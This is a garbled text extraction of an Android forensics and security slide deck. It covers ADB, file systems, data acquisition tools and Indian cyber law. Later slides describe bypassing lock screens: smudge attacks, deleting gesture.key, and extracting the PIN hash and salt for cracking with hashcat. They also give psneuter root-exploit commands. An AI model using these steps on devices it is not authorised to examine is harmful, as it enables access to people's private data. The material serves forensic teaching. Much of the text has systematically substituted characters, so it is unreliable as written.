Upload
bad3106
View
215
Download
0
Embed Size (px)
Citation preview
8/9/2019 androidforensicsandsecuritytesting--phpapp02
1/93
ANDROID – FORENSICS ANDSECURITY ANALYSIS
Santhosh Kumar
8/9/2019 androidforensicsandsecuritytesting--phpapp02
2/93
r00t@b0x : whoami?
Security Researcher for a quite sometime (certs:CEH)
!C at "efcon Chennai#
Current$y %or&in' on R base* Ex+$oitation#
Re+orte* some %eb a++s at icrosoft ,yahoo,inte$,ibm,cisco etc#
Current$y *oin' -ache$ors in Com+uter Science#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
3/93
'en*a:
.ntro*uction to an*roi* an* its History#
Stu*y the n*roi* /i$e systems an*
"irectories# -y+ass assco*es ($$ ty+es of $oc&s)#
hysica$ an* o'ica$ *ata extraction
techniquies# Re1erse en'ineer n*roi* a++$ication#
.n*ian cyber aws#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
4/93
%hy forensics ? %2H is this?
E1i*ence for $e'a$ +rocee*in's#
/inancia$ Crime#
orno'ra+hy3Chi$* orno'ra+hy (+e*o+hi$es)#
Sexua$ harrasment4 (a'ainst women)
2errorism acti1ity or nationa$ threat#
Cyber threats#
Counter inte$$i'ence# ur*er or other crimes#
E':5eor'ia wie$*man attac&e* @confi*enceconference o$an*#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
5/93
.ntro*uction to n*roi*#History ??
8/9/2019 androidforensicsandsecuritytesting--phpapp02
6/93
.ntro*uction to n*roi*4History?
%i*e$y 6se* Smart+hone !S with o1er 778 share in 90;#
2he man behin* n*roi* was
8/9/2019 androidforensicsandsecuritytesting--phpapp02
7/93
n*roi* /eatures#
n*roi* has &ey features which are usefu$ as theforensic +oint of 1iew#
/eatures $i&e 5S,C",2E,%iax,%ifi,-$uttooth
etc# 5oo'$e $ay Store3n*roi* ar&et is Rich source for
forensic na$ysis#
"ata Stora'e#
/$ash(or nan*) memory #
.nterna$ emory#
Externa$ emory#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
8/93
n*roi* !1er1iew:
5$oba$ System for obi$e Communications 5SSubscriber .*entity o*u$e or 6nique Subscriber .*entityo*u$e (S. !R 6S.) to i*entify the user for the ce$u$$arnetwor E':2D,2obi$e (6S) .n*ia-S,.R2E
Co*e "i1ision u$ti+$e ccess C"E':S+rit,1ersion 6S .". 2ata "ocomo,2S .".
.nter'rate* "i'ita$ Enhance* etwor& ."Ewhich is yet to be a1aib$e in in*ia F 6S S+rit#
%or$*%i*e interno+ for microwa1e access %iax6SS+rit .". -S,Re$iance#
on' 2erm E1o$ution 2S (G 5)6S2D2,S+rit,2!-.E,Berion .". irte$,irce$(2"2E)
8/9/2019 androidforensicsandsecuritytesting--phpapp02
9/93
n*roi* !1er1iew:S
8/9/2019 androidforensicsandsecuritytesting--phpapp02
10/93
n*roi* !1er1iew:++s
2he 2ota$ n*roi* ++s Crosse* !1er i$$ion in !B 90;with another 70000 ++s ub$ishe* in I 90G#
2he other com+etitor,++$e which has the Strict ++ 6+$oa*in'an* Re1iew rocess which can 'o throu'h $on' amount of
time,on /u$$fi$$in' many criteria an* con*tions#Sometimes thea++s are *enie* o1er after $on' re1iew# i!S *oesnJt a$$ow thea++s which are away from the ++ ar&et#
5oo'$e,%hich requires $ess +rocess for submittin' the a++(such as the secure &ey) %hi$e 'oo'$e has the +ower toRemo1e the a++ from the mar&et,-an Hammer the "e1e$o+eran* Remote$y uninsta$$ the a++#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
11/93
!S im+ortance
s Sai* Ear$ier !S maintains the*e1e$o+ment an* re$eases new 1ersions an*fixes#
Com+i$in' the !S is the best way toun*erstan* the wor&in' of the n*roi*#
htt+:33
source#an*roi*#com3source3initia$iin'#htm$ ot necessary for the /orensics ana$ysts but
usefu$ for the "ee+ Ex+erimentation#
%e *onJt be "oin' that now
http://source.android.com/source/initializing.htmlhttp://source.android.com/source/initializing.htmlhttp://source.android.com/source/initializing.htmlhttp://source.android.com/source/initializing.html
8/9/2019 androidforensicsandsecuritytesting--phpapp02
12/93
inux,!+en source Software in /orensics
!+en source forensic too$s ha1e a$ways been moreeffecti1e in the *i'ita$ forensic *isci+$ine#!+en sourcetoo$s a$ways has u++er han* than c$ose* source
too$s2he ower to Biew the source co*e an* un*erstan*the wor&in' of it#2he abi$ity to share software an* im+ro1e it bywor&in' to'ether with the forensic community#/ree or ow Cost#
inux is not on$y a critica$ com+onent in n*roi* butcan be effecti1e$y use* in forensic ana$ysis#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
13/93
.6A comman*s:
n*roi* /orensics in1o$1es
some of the inux &now$e*'efo$$owin' comman*s are usefu$
man
he$+
c*
m&*ir
mount
rm*ir3rm rf
nano
$s
tree
cat
**
fin*
chown
chmo*
su*o
a+t'et 're+
F an*
any more LLLL##
8/9/2019 androidforensicsandsecuritytesting--phpapp02
14/93
En1ironment Setu+
6buntu ;93MG bit ( . recommen* MG bit) with n*roi* S"K
6buntu 9#0G (+recise) MG bit runnin' on 1mware31irtua$box
htt+:33www#1mware#com or htt+:33www#1irtua$box#or'
Ha1e at$east 90 5b free S+ace an* 9 5- ram #
Ha1e %in*ows for Some commercia$ too$s (ex+$aine*$ater)
. recommen* Santo&u inux which is a entire hac&in'*istro *e*icate* to obi$e forensics an* Security#
htt+:33www#santo&u$inux#com which is in*ee* ma*e byhtt+:33www#1iaforensics#com a obi$e entestin'
com+any#
http://www.vmware.com/http://www.virtualbox.org/http://www.santoku-linux.com/http://www.viaforensics.com/http://www.viaforensics.com/http://www.santoku-linux.com/http://www.virtualbox.org/http://www.vmware.com/
8/9/2019 androidforensicsandsecuritytesting--phpapp02
15/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
16/93
n*roi* rchitecture
8/9/2019 androidforensicsandsecuritytesting--phpapp02
17/93
HR"%RE "EB.CES
Smart+hones
2ab$ets
5oo'$e 21 Car u*io Systems
5oo'$e 5$asses
Smart %atch
5S /ri*'e an* %ashin' achine
("/O)
irrors (you Saw it ri'ht :)cybertecturemirror#com
Cameras
5ammin' conso$es
"EC2 +hones(a n*roi* an*$ine)
Smart 2BJs
a P00Q an*roi* *e1ices
8/9/2019 androidforensicsandsecuritytesting--phpapp02
18/93
R! -ootin' +rocess
Stoc& Rom 1aries frommanufacturer to manufacturer
cuta$$y hone bootin'+rocess#
Short Se1en R! bootin'+rocess
ower on an* boot R! co*eexecution
2he boot $oa*er
2he inux &erne$
2he init +rocess
y'ote an* "a$1i&
2he system ser1er
-oot com+$ete*
8/9/2019 androidforensicsandsecuritytesting--phpapp02
19/93
R! bootin' +rocess
htt+:33www#an*roi*enea#com3900>30M3an*roi*boot+rocessfrom+oweron#htm$
8/9/2019 androidforensicsandsecuritytesting--phpapp02
20/93
n*roi* ++$ication Security o*e$
n*roi* at the insta$$ation of the ++(#a+&) chec& for the*e1e$o+ers unique si'nature# (ot C)#
ext it 'i1es out the *is+$ay of the an*roi* a++ fi$e +ermission#2he source is $ocate* in the an*roi*manifest#xm$
2his fi$e is the +otentia$ when it comes to forensic ana$ysis an**etermine the +ermission(ma$icious a++)#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
21/93
++$ication +rocess
Ouic& re1iew of the an*roi* a++ execution#
E1en thou'h n*roi* a++s are ma*e in a1a but they are notexecute* in a1a format#
Each a++ 'ets a unique $inux ."(ui*) an* 5rou* ."('i*)#
5ets own *e*icate* +rocess an* *e*icate* *a$1i& B#
2he ++ "ata 'ets store* in "ata 3*ata3*ata3a+++rocessaccessib$e on$y by 6." an* 5."#(root exce+tiona$)#
++s can share the *ata with other a++s usin' content
+ro1i*ers#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
22/93
Some fi$es which is usefu$
Cache#im' :*is& ima'e of the 3cache +artion#
S*car*#im':*is& im' of the cache +artion(im' here is from B"emu$ator)
6ser*ataemu#im': *is& ima'e of the *ata +artion#
L# 6sefu$ in the areas of forensics
8/9/2019 androidforensicsandsecuritytesting--phpapp02
23/93
6S- connection of the e1i*ence *e1ice
"ifferent "e1ices ha1e *ifferent o+tions#
2he common four areChar'e on$yfi$e transfer
Sync.nternet tetherin'#
Chec& the connection to the hostby ty+in'
8/9/2019 androidforensicsandsecuritytesting--phpapp02
24/93
Chec&in' 6S- connection
8/9/2019 androidforensicsandsecuritytesting--phpapp02
25/93
recautions : (must nee*e*)
a&e sure to "isab$e auto mount feature in ubuntu to +re1entautomatic *etection an* mountin' of 6S- stora'e#
E1ery fra'i$e chan'e cou$* $ea* to a$teration of e1i*ence#
Har*ware write b$oc&er usefu$ to some extent#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
26/93
S" car* info
ost of the S"CR" *etai$s are store* in 3*ata3
++ *etai$s in 3*ata3*ata(it *iffers :)
8/9/2019 androidforensicsandsecuritytesting--phpapp02
27/93
n*roi* "ebu' bri*'e
8/9/2019 androidforensicsandsecuritytesting--phpapp02
28/93
n*roi* "ebu' -ri*'e
ost im+ortant com+onent when it comes to an*roi* forensics#
Consi*er it as a swiss army &nife for forensics an* securityana$ystis#
Enab$e usb *ebu''in' *e1e$o+er o+tions usb *ebu''in'#
2his wi$$ run a*b* (*aemon) on the *e1ices#
*b* runs on the user account(6.") un$ess +romte* with theroot +ri1i$e'es#
.f your *e1ice is $oc&e* then it is *ifficu$t to un$oc& usb
*ebu''in'#(not 008 im+ossib$e)
8/9/2019 androidforensicsandsecuritytesting--phpapp02
29/93
"- com+onents
*b* on the *e1ices#
*b* on the wor&station#
*b on the wor&station#
*b is free,+rimary too$ for forensics an* ofcourse o+ensource
8/9/2019 androidforensicsandsecuritytesting--phpapp02
30/93
*b she$$ exam+$e
*b she$$ 'i1es out $ot of information(*e+en*s on root or not)#
2he "ata fo$*er is usefu$ when you are roote*#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
31/93
"ata from a*b
Sms History ("e$ete*)#
Contacts(com#+hone#an*roi*)
Ca$$ historyrecei1e*,*e$ete*,misse* etc#
"ataboo&
E1ents#
Ca$en*er#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
32/93
/i$e Systems
ot of fi$e systems in the an*roi* o+eratin' system#
ore than a *oen is in use#
2he main three areEA2/2;9T//s9 Source for the user *ata
8/9/2019 androidforensicsandsecuritytesting--phpapp02
33/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
34/93
"ata Stora'e metho*s
2he main metho*s where sensiti1e *atastore*#
Share* +references
.nterna$ stora'e
Externa$ stora'e
Sq$ite;
etwor&
8/9/2019 androidforensicsandsecuritytesting--phpapp02
35/93
Share* +references
.t is where a$$ the *ata which is share* between the a++s arestore*#
Key 1a$ues are store* in A fi$es
8/9/2019 androidforensicsandsecuritytesting--phpapp02
36/93
.nterna$ Stora'e
Common in most of the systems :ext;,extG,yaffs9
6nroote* user cannot access 3*ata3*ata as it isencry+te*#root is nee*e* for 1iewin' the contents
8/9/2019 androidforensicsandsecuritytesting--phpapp02
37/93
.nterna$ stora'e
60Na0 is the owner means it is that user whoinsta$$e* the a++
8/9/2019 androidforensicsandsecuritytesting--phpapp02
38/93
Externa$ Stora'e
.t has $ess restrictions when com+are* to the interna$ stora'e#
/2 ;9 is common$y foun* fi$e system on the s*car*#
s su''este* ear$ier most a++s *ata is store* here it is betterto $oo& here#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
39/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
40/93
SO.2E;some usefu$ comman*s
Sq$ite; *bfi$ename
#tab$es
#hea*ers onFoff
#mo*e
Se$ect U from tab$e
#*um+?tab$e?
#quit
oa*s the *b
Shows the tab$es
2urns hea*ers on3off
!ut+ut mo*e fi$e ty+e "is+$ays the tab$e attirubutes
"um+ the tab$e
Exit the she$$ +rom+t
8/9/2019 androidforensicsandsecuritytesting--phpapp02
41/93
Sq$ite; *atbase exam+$e
itt$e catch : sq$ite; is not insta$$e* in rea$ +hones by *efau$t#
/or test con*itions . ha1e use* a1* emu$ator from an*roi*#
2hose *atabases ha1e $ot of tab$es which can be rea$ han*y#
Some nati1e roots ha1e sq$ite; sym$in&e* by *efau$t#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
42/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
43/93
o'cat
"is+$ays a$most e1eythin' thatJs been 'oin' aroun* your *e1icein the a*b she$$htt+:33*e1e$o+er#an*roi*#com3too$s3he$+3$o'cat#htm$
Has *ifferent +arameters#
http://developer.android.com/tools/help/logcat.htmlhttp://developer.android.com/tools/help/logcat.htmlhttp://developer.android.com/tools/help/logcat.html
8/9/2019 androidforensicsandsecuritytesting--phpapp02
44/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
45/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
46/93
Enab$e usb *ebu''in' when $oc&e* ?? ossib$e
8/9/2019 androidforensicsandsecuritytesting--phpapp02
47/93
Enab$e usb *ebu''in' when $oc&e* ?? ossib$e-S2(best smart too$s)
8/9/2019 androidforensicsandsecuritytesting--phpapp02
48/93
Crac& the co*es
8/9/2019 androidforensicsandsecuritytesting--phpapp02
49/93
6n$uc&y sti$$? Here comes the +assco*es brea&in'4
Bery usefu$ when it comes to forensic4othin' beats this #
Barious techniques for brea&in' an*roi*+assco*es#
/ew wi$$ be *iscusse* here#
2here is no *irect ru$e for brea&in'+assco*es#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
50/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
51/93
2y+es of +asswor*s ?
8/9/2019 androidforensicsandsecuritytesting--phpapp02
52/93
Crac&in' techniques
Smu*'e attac
attern $oc& 1u$nerabi$ity#
sneuter with a*b,usb *ebu''(if enab$e*)# Crac&in' the +asswor* &ey#
/ace un$oc& +wn with a +icture#
Continues to e1o$1e LLLL
8/9/2019 androidforensicsandsecuritytesting--phpapp02
53/93
Smu*'e attac&
Screen(*i'ita$ier) is ref$ecti1esurface,smu*'e(+attern) which *iffuse in the '$ass#
-ein' *ust +artic$e,when ex+ose* to $i'ht ref$ect
them# camera setu+ to ca+ture the o1erex+ose* ima'e
aroun* MP times wi$$ 'i1e a P08 correct ima'e#
.t 'i1es out the *is+$ay +attern#
ot a$ways wor&in',$i&e +$ayin' tem+$e run cou$*remo1e the smu*'e tota$$y#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
54/93
Smu*'e attac&
8/9/2019 androidforensicsandsecuritytesting--phpapp02
55/93
attern oc& crac&
attern creates a fi$e in 3*ata3system3'esture#&ey
Hash is store* there#if custom reco1ery is insta$$e* $i&e 2%Rreco1ery,C% reco1ery etc#
Remo1e the &ey usin' the rm comman* an* recreate it usin'your own hash#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
56/93
attern oc& crac&
Key can a$so be *ecry+te* 4 Some sites *o 'i1eser1ices for free#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
57/93
Crac&in' +ins
%hen +asswor*3+ins are use* they are store* in3*ata3system3+asswor*s#&ey
s you can see it is not in +$aintext but as Ran*omQshaQm*W#
ot easy *e+en*s on the nature of +asswor*#
u$$ the sa$t
from3*ata3*ata3com#an*roi*#+ro1i*ers#settin's3*atabases3settin's#*b an* 'et the +asswor* from abo1e#
ut them in the fo$*er an* try to attac& them in +asswor* reco1erytoo$s such as hashcat3ohn the ri++er by bruteforcin' them
8/9/2019 androidforensicsandsecuritytesting--phpapp02
58/93
wn face D 1oice un$oc&
ot secure at a$$ when 'oo'$e intro*uce* it in an*roi* G#0#
Re+orte* to un$oc& with the +hoto of the +erson#
fter &it&at an*roi* u+*ate the face un$oc& when to a chan'e where the+erson ha1e to un$oc& by b$in&in' the eye which shows the a$i1e ness ofthe ca+ture* ima'e#
'ain easi$y bro&en by *uc& faces,smi$in' ima'es from faceboo& :
8/9/2019 androidforensicsandsecuritytesting--phpapp02
59/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
60/93
5et fRoSte*
/rost Security 2eam was ab$e to brea& the encry+tion bycoo$in' the *e1ice to W c in M0 minutes#
Switch off an* /$ash the /rost Reco1ery#
ot the entire ES &eys are *ecry+te*#Some bits were
*ecaye*#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
61/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
62/93
'0t r00t?
8/9/2019 androidforensicsandsecuritytesting--phpapp02
63/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
64/93
2y+es of r00t?
2em+ root: 'i1es you root access ti$$ youreboot the *e1ice#
Reco1ery root: custom reco1ery such asc$oc&wor&mo*(C%%),twr+ etc wi$$ 'i1eroot access in the reco1ery#
ermanent root:insta$$ su to the system
$ea1in' a hu'e foot+rint#most custom romsha1e +erm root by *efau$te':cyano'enmo*,omni,+ano*roi* etc#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
65/93
2em+orary root
2em+ root is somethin' essentia$ when it come toforensic#(Groot#a+&)
"oesnJt wor& on a$$ *e1ices,test it first before usin'#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
66/93
sneturer a tem+ root so$ution#
eturer is a an*roi* ser1er#this a++ ex+$oits that ser1er 'i1in'us a tem+rarory so$ution#
a*b *e1ices
a*b +ush +sneuter 3*ata3$oca$3tm+
a*b she$$
c* 3*ata3$oca$3tm+
chmo* 777 +sneuter
#3+sneuter
8/9/2019 androidforensicsandsecuritytesting--phpapp02
67/93
ermanent root
not 'oo* as far as forensic is concerne*#
ea1es a hu'e foot+rint a$terin' the e1i*ence# Search x*a formore roots#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
68/93
R00t with binary
5i1es root to a$most a$$ the G#0 to G#*e1ices#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
69/93
Kin'o an*roi* root
2his one 'i1es root o1er a$$G#9#x,G#;#x,G#G#x
8/9/2019 androidforensicsandsecuritytesting--phpapp02
70/93
n*roi* forensic techniques
o'ica$ an* +hysica$ acquisition#
!+en source too$s an* some commerica$too$s#qt"- n*ri$$er ce$$ebrite
+araben1iaextract L#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
71/93
o'ica$ 1s +hysica$ cquisition
o'ica$ +hyscia$
ccess to fi$e systems
"ata which is a$rea*ya1ai$ab$e to user
E':"- +u$$,af$o'ica$
Ex+$orin' thememory,not the fi$esystem#
ore *ata than $o'ica$,bybrea&in' +asswor*s etc
Har*ware an* software
8/9/2019 androidforensicsandsecuritytesting--phpapp02
72/93
o'ica$ S*car* anquisition
++s "ata 'ets store* in 3*ata which is encry+te*an* root access#
S" car*s where the user stuffs stays#
(au*io,1i*eo,ma+s)# 6ses cross +$atform /2 /S#
ost bac&u+ store* in S*car*#
#a+&Js in s*car* mi'ht be encry+te*#
6sefu$ *one when ;r* +arty a++s are ana$ysis#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
73/93
"- +u$$ $o'ica$
8/9/2019 androidforensicsandsecuritytesting--phpapp02
74/93
qt"-
8/9/2019 androidforensicsandsecuritytesting--phpapp02
75/93
/$o'ica$
"ata Extraction too$s#
/ree for $aw enforcement a'encies#
Recor*s ca$$ $o's,contact etc#
"E!
8/9/2019 androidforensicsandsecuritytesting--phpapp02
76/93
6/E" touch u$timate
6/E" 2ouch 6$timate, enab$es the most techno$o'ica$$ya*1ance* extraction, decoding, analysis and reorting ofmobi$e *ata# .t +erforms !ysical, logical, "ile syste# andass$ord extraction of a$$ *ata (e1en if *e$ete*) from the
wi*est ran'e of *e1ices inc$u*in' $e'acy an* feature +hones,smart+hones, +ortab$e 5S *e1ices, tab$ets an* +honesmanufacture* with Chinese chi+sets#Cost:0000Y
8/9/2019 androidforensicsandsecuritytesting--phpapp02
77/93
6/E" whatJsa++ ana$ysis
8/9/2019 androidforensicsandsecuritytesting--phpapp02
78/93
"e1ice Seiure
8/9/2019 androidforensicsandsecuritytesting--phpapp02
79/93
"e1ice Seiure:Re+ort
8/9/2019 androidforensicsandsecuritytesting--phpapp02
80/93
n*ri$$er
a$ternati1e an* a +owerfu$ o+en sourcetoo$#
htt+:33an*roi*#sa#$t3
a*e by Denis Sa%ono& @*enGu&
5i1e it a try you wont re'ret it
"E!LLLLLLL##
http://android.saz.lt/https://twitter.com/den4ukhttps://twitter.com/den4ukhttp://android.saz.lt/http://android.saz.lt/
8/9/2019 androidforensicsandsecuritytesting--phpapp02
81/93
hotos
2ry $oo&in' here for more e1i*ence#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
82/93
Re1ersin' +&Js
Rename n*roi* a++ (#a+&) to #i+#
Extract i+
Run *ex9ar on the extracte* fi$e# !+en the #ar in a a1a *ecom+i$er#
K2!!
n*ro'uar* +&ins+ector
3
8/9/2019 androidforensicsandsecuritytesting--phpapp02
83/93
n*roi*32orec#
/irst e1ery n*roi* base* 2or ma$warewhich was foun* in the wi$*#
REBERS.5 "E!
/ f * i* f i
8/9/2019 androidforensicsandsecuritytesting--phpapp02
84/93
/uture of n*roi* forensics
2he future research wor& wi$$ be on theSean*roi*#
Contribute* by ationa$ Security 'ency(S) Ucou'hU
otto to ha1e secure an*roi*#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
85/93
% it 4 % it ? % it ?
8/9/2019 androidforensicsandsecuritytesting--phpapp02
86/93
%ait 4 %ait ? %ait ?
Sen*roi* was a$rea*y *efeate*#2he CBE 90;M9P9
au !$i1ia Ha* a !C base* a toshiba tab$et runnin' G#; I-#
8/9/2019 androidforensicsandsecuritytesting--phpapp02
87/93
.". b $
8/9/2019 androidforensicsandsecuritytesting--phpapp02
88/93
.". cyber$aws
"e1ice as tar'et or wea+on
.2 act 9000
.2 amen*ment C2 (900P)
Ru$es un*er MM,G;,7>
SEC2.! MW
htt+:33www#cyberforensics#in3htt+:33*eity#'o1#in3content3cyber$aws
8/9/2019 androidforensicsandsecuritytesting--phpapp02
89/93
T
O6ES2.!S?
8/9/2019 androidforensicsandsecuritytesting--phpapp02
90/93
8/9/2019 androidforensicsandsecuritytesting--phpapp02
91/93
R f
8/9/2019 androidforensicsandsecuritytesting--phpapp02
92/93
References:
1iaforensics#com
/orensicfocus#com
ce$$ebrite#com
an*roi*#sa#$t
ex+$oit*b#com
www#"orensicswi&i#or'3wi&i3Cell(+!one N Forensics
da-de&eloers.co#
http://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensicshttp://www.forensicswiki.org/wiki/Cell_Phone_Forensics
8/9/2019 androidforensicsandsecuritytesting--phpapp02
93/93